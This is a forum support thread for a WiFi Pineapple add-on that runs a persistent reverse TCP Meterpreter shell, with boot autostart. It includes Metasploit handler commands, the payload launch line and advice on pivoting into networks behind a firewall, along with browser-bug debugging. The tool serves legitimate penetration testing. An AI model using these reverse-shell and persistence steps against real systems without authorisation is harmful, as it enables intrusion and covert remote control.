Jump to content

[Support] Meterpreter


Darren Kitchen

Recommended Posts

New infusion! Meterpreter. Persistent reverse tcp for all your shell and pivoting needs. Enjoy!

e8ek0RT.jpg

E315Khz.jpg

bG8bl4n.jpg

Meterpreter Infusion version 1.0

Host - IP or Hostname of target meterpreter listener
Port - Port number of target meterpreter listener
Update Meterpreter Configuration - saves Host and Port settings in /etc/config/meterpreter configuration file.

Meterpreter Start - Starts a persistent meterpreter with configured settings. If connection fails a retry attempt will be made immediately.
Meterpreter Stop - Kills meterpreter and prevents further instances from automatically attempting connection.

Autostart Enable - Enables meterpreter on boot by adding 'pineapple infusion meterpreter&' command to /etc/rc.local
Autostart Disable - Disables meterpreter on boot by removing 'pineapple infusion meterpreter&' command from /etc/rc.local

Tips:

While general metasploit help is outside the scope of this infusion, the following commands will typically work:

    use exploit/multi/handler				# Handles multiple meterpreter sessions
    set PAYLOAD php/meterpreter/reverse_tcp		# Setting for Reverse TCP Meterpreter
    set LHOST [host or ip]				# Hostname or IP of listener
    set LPORT [port number]				# Port of listener
    set ExitOnSession false				# Let the exploit continue when meterpreter exists
    exploit -j						# Make the exploit a backgroundable job

    sessions						# Lists sessions
    sessions -i [number]				# Interacts with session number



          ,__,
          (oo)____
          (__)    )\
             ||--|| *
          Like Metasploit? 
          Perhaps you'd enjoy Metasploit Minute with Mubix! 
          http://www.metasploitminute.com </shameless plug>

Link to comment
Share on other sites

I press the download nothing happenes :(

Same here. It's at the bottom of the list and when I click it... nothing, no pop-up.

If it helps, this is the install link and the relevant JavaScript function:


http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup'>http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup
or
http://172.16.1.10:1471/#sys/bar/preinstall/{"id":"91","name":"meterpreter","version":"1.0","description":"GUI for Meterpreter reverse TCP. Accepts lhost/lport. Supports start/stop, autostart enable/disable. Provides a persistent remote shell, pivoting.","author":"hak5darren","md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf","num_downloads":"3"}/popup
function handle_hash_change(hashValue){
  //[0]:type - [1]:infusion_name - [2]:action - [3]:data - [4]:callback_function 
  var hash_array = hashValue.replace(/#/g, '').split('/');
  if(hash_array.length == 5){
    //Correct size, carry on
    $.ajaxSetup({async:false});
    if(hash_array[0] == "usr"){
      $.get('/components/infusions/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
        try{
          window[hash_array[4]](data);
        }catch(err){
          console.log("Function not found");
        }
      });
    }else if(hash_array[0] == "sys"){
      $.get('/components/system/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
        try{
          window[hash_array[4]](data);
        }catch(err){
          console.log("Function not found");
        }
      });
    }
    $.ajaxSetup({async:true});
  }

  //reset url so that we can call the same link again.
  window.location='#';
}

What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.

Edited by fringes
Link to comment
Share on other sites

Same here. It's at the bottom of the list and when I click it... nothing, no pop-up.

<snip>

What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.

As you can see, the first link you have posted is urlencoded. The second link you posted was the decoded version. Thing is, you did the decoding yourself - the WiFi Pineapple doesn't do that (as you can see, no url decoding done in the handle_hash_change function. It also shouldn't be the '/' character as the datalocker infusion works and also has a '/' in the description.

I know that on firmware 1.4.1, the download works - I just downloaded and installed the infusion once again.

Best Regards,

Sebkinne

Link to comment
Share on other sites

Aaaaaaaaaaand we got to the bottom of the issue.

Firefox automatically decodes window.location.hash, therefore this fails.

For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap.

Best Regards,

Sebkinne

Link to comment
Share on other sites

Firefox automatically decodes window.location.hash, therefore this fails.

Yes, Firefox does that. What browser do you normally recommend for the pineapple?

For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap.

Do you really think a firmware upgrade is necessary for this, or are there other fixes you're going to incorporate? It seems to me that removing the "/" characters from all the infusion descriptions should be good enough until the next release. (I see you've already done this! Get some sleep Seb. :cool:)

Thanks for getting to this so quickly. I would have opened an issue, but I was already running late for work.

PS: I just installed the Meterpreter infusion; good job.

Link to comment
Share on other sites

Hi . i really like metasploit , but i cant figure out ,what exactly the meterpreter infusion will do .

i have kali linux on a laptop with ip 192.168.0.100 and port 4444 that is listening with the php reverse tcp payload. when i start the meterpreter infusion on mkv with the 192.168.0.100 port 4444 there is a short message with the sending stage and thats all . i dont know how to use this . where is the php payload and what should i do ? i looked in the www folder in mkv but there is nothing.

thanx for helping !!

Link to comment
Share on other sites

I'm not really sure what your issues are, so I'll try to give you some general help.

I assume you opened the infusion, clicked "Help" and followed the instructions. You should have seen Metasploit sending the stage to your pineapple's IP and then opening a Meterpreter session. If so, you've pwned your pineapple. (If Kali is running in a VM, make sure it's using bridged network mode; the pineapple must be able to connect to it.)

The meterpreter.php payload was installed with the infusion and can be found in the same directory tree, but that isn't relevant. You just need to start the correct handler (listener) in Metaspoit (e.g msfconsole) in Kali, point the infusion at it and click "Start."

As far as what it "will do"... Conceptually, your pineapple might be physically placed on a target network behind a firewall. So having Meterpreter running on the pineapple gives you a foothold inside that network for scanning and "pivoting" to pursue other hosts via Metasploit.

Link to comment
Share on other sites

  • 3 weeks later...
  • 1 month later...

i have been searching,

i have a idea to add to this infusion

using msf rpc api technically you could set up a remote msf infusion to connect to msf thru the pineapple and controll it from a web shell/interface

thought was

connect to msf dropdown ip box 172.16.42.42 user pass

what do you think?

Link to comment
Share on other sites

On the current firmware (2.0.3), I get an issue with the infusion. When running the steps in the executable by hand I get:

X-Powered-By: PHP/5.4.5
Set-Cookie: PHPSESSID=a4f0e2c39e31a5528c27cee25cf91b6a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<html>

<head>
        <title>WiFi Pineapple - Login</title>
        <meta http-equiv="cache-control" content="max-age=0" />
        <meta http-equiv="cache-control" content="no-cache" />
        <meta http-equiv="expires" content="0" />
        <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
        <meta http-equiv="pragma" content="no-cache" />
        <link rel="stylesheet" type="text/css" href="includes/css/styles.php" />
        <script src="includes/js/jquery.min.js"></script>
        <noscript><meta http-equiv="refresh" content="0;url=index.php?noJS" /></noscript>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body style="background-color:black; color: white;">
  <center>
<div style="background-color: black; position: absolute; margin: auto; top: 50%; left: 50%; width: 256px; height: 356; ; margin-top: -178px;">
    <img src="/includes/img/mk5_logo.gif"><br /><br />
    <form action="" method="POST">
      <table>
        <tr><td>Username:</td><td><input type="text" name="username" value="root"></td></tr>
        <tr><td>Password:</td><td><input type="password" name="password"></td></tr>
      </table>
      <input type="submit" name="login" value="Log In">
    </form>
</div>
  </center>

</body>



</html>

Modifying the executable from :

php-cgi $DIR/meterpreter.php $IP $PORT > /dev/null

to :

cd $DIR > /dev/null                                      
php-cgi ./meterpreter.php $IP $PORT > /dev/null  

Seems to solve the issue.

Link to comment
Share on other sites

  • 4 weeks later...

Works fine here!

I have a question...

Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network.

Does the pineapple send the shell or receive the shell?

Link to comment
Share on other sites

I have a question...

Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network.

Does the pineapple send the shell or receive the shell?

Hi d0n350n,

The pineapple has multiple ip interfaces, and can be used in a variety of different configurations.

Try reading through this excellent set of guides from Scott Helme page:

https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

Also, I've found the info on Cisco's site helpful in the past.

http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

It should help you understand the main points.

Cheers.

:wink:

Edited by 3mrgnc3
Link to comment
Share on other sites

Hi d0n350n,

The pineapple has multiple ip interfaces, and can be used in a variety of different configurations.

Try reading through this excellent set of guides from Scott Helme page:

https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

Also, I've found the info on Cisco's site helpful in the past.

http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

It should help you understand the main points.

Cheers.

:wink:

Thanks Bro!! I figured it out, sorta, lol, but let me ask you this? I can get a meterpreter session, but none of the commands work, not even help or shell?

Link to comment
Share on other sites

  • 1 month later...

************** SOLVED ***************

I'm such a massive tool and feel I need to appologise to the community for failing to RTFM!!! :rolleyes:

phpsystems +1 You had the answer right there a few lines above....

All the best

3mrgnc3

************** SOLVED ***************

I can't for the life of me seem to get this working...

Can someone help me here?

So, In just over a week we have a big demo and equipment test week at work.

I'm trying to convince my boss to get us a load of new kit (including a box full of pineapples!)

The Meterpreter infusion is pretty central to my argument for us using the Pineapple.

Here are my settings...

1.JPG2.JPG

9.JPG

3.JPG

4.JPG

8.JPG

7.JPG

6.JPG

5.JPG

I initially set up openssl and installed my own certificates for secure https web access using firefox.

Ive also reverted the nginx config back to default and tried it out using plain old http on Firefox, Icewesel, IE 11, and the latest Chrome...

P.S. The Pineapple has been renamed to "RBx" in line with the project I'm using it for just incase people start to wonder :grin:

Any tips?

Cheers.

3mrgnc3

Edited by 3mrgnc3
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...